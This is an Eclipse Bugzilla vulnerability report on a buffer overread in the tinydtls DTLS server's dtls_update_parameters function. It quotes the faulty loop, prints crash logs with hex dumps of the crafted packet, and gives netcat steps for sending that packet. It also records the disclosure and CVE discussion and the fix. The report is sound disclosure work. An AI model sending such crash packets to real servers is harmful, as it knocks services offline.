Bug 544824 - DTLS server - buffer overflow leading to crash (dtls_update_parameters)
Summary: DTLS server - buffer overflow leading to crash (dtls_update_parameters)
Status: RESOLVED FIXED
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Vulnerability Reports (show other bugs)
Version: unspecified   Edit
Hardware: All All
: P3 major (vote)
Target Milestone: ---   Edit
Assignee: Security vulnerabilitied reported against Eclipse projects CLA
QA Contact:
URL:
Whiteboard:
Keywords: security
Depends on:
Blocks:
 
Reported: 2019-02-26 08:57 EST by Cve Reporting CLA
Modified: 2020-01-13 06:58 EST (History)
4 users (show)

See Also:

Attachments
DTLS packet causing crash (80 bytes, image/x-panasonic-raw)
2019-02-26 08:57 EST, Cve Reporting CLA 		no flags Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Cve Reporting CLA 2019-02-26 08:57:22 EST 
Created attachment 277693 [details]
DTLS packet causing crash

TinyDTLS DTLS server incorrectly handles incoming network messages leading to buffer overread and crash of the server.
After processing crafted packet server searches for known cipher description provided in DTLS handshake message using loop with wrong finish condition:

  uint8 *data
  ...
  int i, j;
  ...
  i = dtls_uint16_to_int(data); // size 
  ...
  ok = 0;
  while (i && !ok) {
    config->cipher = dtls_uint16_to_int(data);
    ok = known_cipher(ctx, config->cipher, 0);
    i -= sizeof(uint16);
    data += sizeof(uint16);
  }

Variable i goes below zero because it is decremented by 4 and it is not divisible by 4 while following condition is used: while (i && !ok) ...
That leads to buffer overread and crash of the whole DTLS server via SIGSEGV signal.
If the memory after allocated buffer will contain description of valid cipher above loop will finish and can potentially disclose value of memory.

Proposed CVSS 3.0 score:

7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Error message WITHOUT Address Sanitizer:
--------------------------------------------------------------------------------------
./tinydtls_0.9_master/tests/dtls-server -p 5555 -v 10
Feb 26 13:27:16 DEBG got 80 bytes from port 52467
Feb 26 13:27:16 DEBG dtls_handle_message: PEER NOT FOUND
Feb 26 13:27:16 DEBG peer addr: [...]:52467
Feb 26 13:27:16 DEBG got packet 22 (77 bytes)
Feb 26 13:27:16 DEBG receive header: (13 bytes):
00000000 16 FE FD 00 A7 F6 40 58  00 40 FF 00 40 
Feb 26 13:27:16 DEBG receive unencrypted: (64 bytes):
00000000 01 F6 40 42 4D 00 00 00  00 00 00 3F 3F 3F 3F 3F 
00000010 3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F 
00000020 3F 3F 3F 3F 3F 3F 3F 3F  3F 40 16 16 FE FD 00 00 
00000030 00 0D 00 4D 00 00 40 16  F6 40 01 00 00 00 58 4D 

Feb 26 13:27:16 DEBG received handshake packet of type: client_hello (1)
Feb 26 13:27:16 DEBG handle handshake packet of type: client_hello (1)
Feb 26 13:27:16 DEBG create cookie: (16 bytes): 7715AC53E94D8FA898000DC336824940
Feb 26 13:27:16 WARN error while fetching the cookie, err: 0
Feb 26 13:27:16 DEBG creating new peer
Feb 26 13:27:16 DEBG dtls_new_peer: [...]:52467
Feb 26 13:27:16 DEBG DTLSv12: initialize HASH_SHA256
Feb 26 13:27:16 DEBG clear MAC
Segmentation fault
--------------------------------------------------------------------------------------

Error message WITH Address Sanitizer:
--------------------------------------------------------------------------------------
./tests/dtls-server -p 5555 -v 10
Feb 26 12:53:48 DEBG got 80 bytes from port 52559
Feb 26 12:53:48 DEBG dtls_handle_message: PEER NOT FOUND
Feb 26 12:53:48 DEBG peer addr: [...]:52559
Feb 26 12:53:48 DEBG got packet 22 (77 bytes)
Feb 26 12:53:48 DEBG receive header: (13 bytes):
00000000 16 FE FD 00 A7 F6 40 58  00 40 FF 00 40 
Feb 26 12:53:48 DEBG receive unencrypted: (64 bytes):
00000000 01 F6 40 42 4D 00 00 00  00 00 00 3F 3F 3F 3F 3F 
00000010 3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F 
00000020 3F 3F 3F 3F 3F 3F 3F 3F  3F 40 16 16 FE FD 00 00 
00000030 00 0D 00 4D 00 00 40 16  F6 40 01 00 00 00 58 4D 

Feb 26 12:53:48 DEBG received handshake packet of type: client_hello (1)
Feb 26 12:53:48 DEBG handle handshake packet of type: client_hello (1)
e = 36
dtls_get_fragment_length(DTLS_HANDSHAKE_HEADER(msg)) - e = 27
Feb 26 12:53:48 DEBG create cookie: (16 bytes): 65830D94F6A9CC2A865EB4E060BD21F5
Feb 26 12:53:48 WARN error while fetching the cookie, err: 0
Feb 26 12:53:48 DEBG creating new peer
Feb 26 12:53:48 DEBG dtls_new_peer: [...]:52559
Feb 26 12:53:48 DEBG DTLSv12: initialize HASH_SHA256
Feb 26 12:53:48 DEBG clear MAC
// additional debug messages displaying variables i and data from dtls_update_parameters
i = 13 data = 0x62e0df 
i = 11 data = 0x62e0e1 
i = 9 data = 0x62e0e3
i = 7 data = 0x62e0e5 
i = 5 data = 0x62e0e7 
i = 3 data = 0x62e0e9 
i = 1 data = 0x62e0eb 
i = -1 data = 0x62e0ed 
i = -3 data = 0x62e0ef 
i = -5 data = 0x62e0f1  
...
i = -1319 data = 0x62e613 
i = -1321 data = 0x62e615 
i = -1323 data = 0x62e617 
=================================================================
==27017==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000062e618 at pc 0x00000040c451 bp 0x7ffda7c72970 sp 0x7ffda7c72960
READ of size 1 at 0x00000062e618 thread T0
    #0 0x40c450 in dtls_uint16_to_int tinydtls_0.9/numeric.h:94
    #1 0x40c450 in dtls_update_parameters tinydtls_0.9/dtls.c:1074
    #2 0x40c450 in handle_handshake_msg tinydtls_0.9/dtls.c:3459
    #3 0x4102cc in handle_handshake tinydtls_0.9/dtls.c:3549
    #4 0x4102cc in dtls_handle_message tinydtls_0.9/dtls.c:3936
    #5 0x402dc9 in dtls_handle_read tinydtls_0.9/tests/dtls-server.c:177
    #6 0x402dc9 in main tinydtls_0.9/tests/dtls-server.c:352
    #7 0x7f1ab363582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x401ba8 in _start (tinydtls_0.9/tests/dtls-server+0x401ba8)

0x00000062e618 is located 40 bytes to the left of global variable 'addrstr' defined in 'dtls-server.c:185:15' (0x62e640) of size 256
0x00000062e618 is located 0 bytes to the right of global variable 'buf' defined in 'dtls-server.c:154:16' (0x62e0a0) of size 1400
SUMMARY: AddressSanitizer: global-buffer-overflow tinydtls_0.9/numeric.h:94 dtls_uint16_to_int
Shadow bytes around the buggy address:
  0x0000800bdc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdcb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800bdcc0: 00 00 00[f9]f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800bdcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdce0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
  0x0000800bdcf0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800bdd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 f9
  0x0000800bdd10: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==27017==ABORTING

--------------------------------------------------------------------------------------

Reproduction:

1. Compile tinydtls with Address Sanitizer by enabling compilation flag: -fsanitize=address (using ASAN is not mandatory for reproduction, but gives more information about crash).
    
2. Run DTLS server:
    ./tinydtls_0.9/tests/dtls-server -p 5555 -v 10

3. Send attached crafted message e.g. using netcat:
    netcat -u $IP 5555 < crash_002_dtls_update_parameters.raw
    where $IP is IP of test server
Comment 1 Cve Reporting CLA 2019-05-03 05:18:59 EDT 
We have postponed release of payload for this vulnerability in Cotopaxi framework (https://github.com/samsung/cotopaxi).
Please provide any information, when this issue will be fixed.
If there will be no response for 90 days from report date (26th of February 2019), we will release it to public.
Comment 2 Wayne Beaton CLA 2019-05-14 14:00:34 EDT 
Project team, there's help here:

https://www.eclipse.org/projects/handbook/
Comment 3 Cve Reporting CLA 2019-07-11 11:49:07 EDT 
Please provide any information, when this issue will be fixed.
We will release findings to public before Black Hat USA (August 2019).
Comment 4 Wayne Beaton CLA 2019-07-18 16:15:01 EDT 
I've removed the "committers only" flag to disclose per the security policy.
Comment 5 Olaf Bergmann CLA 2019-07-26 03:25:30 EDT 
This bug has been fixed in https://github.com/eclipse/tinydtls/commit/494a40dfbb174930ca616e560532d52549736b42

This commit will be merged into the master branch as well.
Comment 6 Wayne Beaton CLA 2019-07-29 15:33:49 EDT 
Olaf, do you want to assign a CVE to this vulnerability?

If yes, the steps are described here:

https://www.eclipse.org/projects/handbook/#vulnerability-cve
Comment 7 Olaf Bergmann CLA 2019-07-30 06:50:59 EDT 
Thank you for pointing this out. As the code has not even had its initial release, I do not think that a CVE is necessary this time.
Comment 8 Cve Reporting CLA 2019-07-30 09:32:17 EDT 
As the vulnerability was reported 154 days ago and it was already made public 12 days ago, it is the high time to assign CVE to it.
Comment 9 Cve Reporting CLA 2020-01-07 08:35:44 EST 
Please register this issue in CVE database.
Comment 10 Cve Reporting CLA 2020-01-09 06:56:08 EST 
This vulnerability affects following versions of tinydtls:
- 0.9 (master)
- 0.8.2
- 0.8.1
- 0.3.1
Comment 11 Wayne Beaton CLA 2020-01-10 16:41:19 EST 
(In reply to Cve Reporting from comment #10)
> This vulnerability affects following versions of tinydtls:
> - 0.9 (master)
> - 0.8.2
> - 0.8.1
> - 0.3.1

From where did you obtain these versions?

Eclipse tinydtls has engaged in no formal releases per the Eclipse Development Process. Nor do I see any tags or releases in their repository.
Comment 12 Cve Reporting CLA 2020-01-13 06:58:10 EST 
Versions below 0.9 were taken from the SourceForge repository (https://sourceforge.net/projects/tinydtls/files/)